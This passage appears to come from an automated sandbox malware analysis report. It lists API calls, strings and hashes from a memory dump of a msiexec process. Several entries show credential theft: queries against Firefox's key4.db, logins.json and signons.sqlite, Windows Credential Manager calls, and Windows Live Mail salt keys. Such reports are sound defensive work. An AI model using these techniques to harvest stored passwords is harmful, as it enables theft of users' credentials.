                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2998058495-0
                                                                                                      • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                      • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                        • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                      • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                      • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                      • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                      • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                      • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                      • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                      • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                      • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                      • strlen.MSVCRT ref: 0040BEFE
                                                                                                      • strlen.MSVCRT ref: 0040BF0C
                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                        • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                        • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                      • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                      • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                      • memset.MSVCRT ref: 0040BFDB
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                      • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                      • API String ID: 2303586283-933021314
                                                                                                      • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                      • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                      • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                      • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                      • API String ID: 231171946-2189169393
                                                                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                      • API String ID: 633282248-1996832678
                                                                                                      • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                      • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00406782
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                      • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                      • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                      • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                      • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                      • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                      • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                      • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                      • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                      • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                      Strings
                                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                      • key4.db, xrefs: 00406756
                                                                                                      • , xrefs: 00406834
                                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp$memsetstrlen
                                                                                                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                      • API String ID: 3614188050-3983245814
                                                                                                      • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                      • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                      • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                      • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040A973
                                                                                                      • memset.MSVCRT ref: 0040A996
                                                                                                      • memset.MSVCRT ref: 0040A9AC
                                                                                                      • memset.MSVCRT ref: 0040A9BC
                                                                                                      • sprintf.MSVCRT ref: 0040A9F0
                                                                                                      • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                      • sprintf.MSVCRT ref: 0040AABE
                                                                                                      • _mbscat.MSVCRT ref: 0040AAED
                                                                                                        • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                      • sprintf.MSVCRT ref: 0040AB21
                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                      • API String ID: 710961058-601624466
                                                                                                      • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                      • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                      • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                      • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                      • API String ID: 3402215030-3842416460
                                                                                                      • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                      • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                      APIs
                                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                      • API String ID: 2003275452-3138536805
                                                                                                      • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                      • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                      • API String ID: 1012775001-1343505058
                                                                                                      • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                      • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00444612
                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                                      • memset.MSVCRT ref: 00444668
                                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                                      • memset.MSVCRT ref: 00444690
                                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                      • String ID: salu
                                                                                                      • API String ID: 3691931180-4177317985
                                                                                                      • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                      • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                      • API String ID: 2449869053-232097475
                                                                                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • strlen.MSVCRT ref: 00443AD2
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                                      • memset.MSVCRT ref: 00443B2E
                                                                                                      • memset.MSVCRT ref: 00443B4B
                                                                                                      • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                      • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                        • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpymemset$??2@??3@AddressByteCharFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                      • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail$`{/h
                                                                                                      • API String ID: 4030136668-2318501205
                                                                                                      • Opcode ID: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                                                                      • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                      • Opcode Fuzzy Hash: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                                                                      • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                      APIs
                                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                      • API String ID: 3259144588-3822380221
                                                                                                      • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                      • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                      • API String ID: 2449869053-4258758744
                                                                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
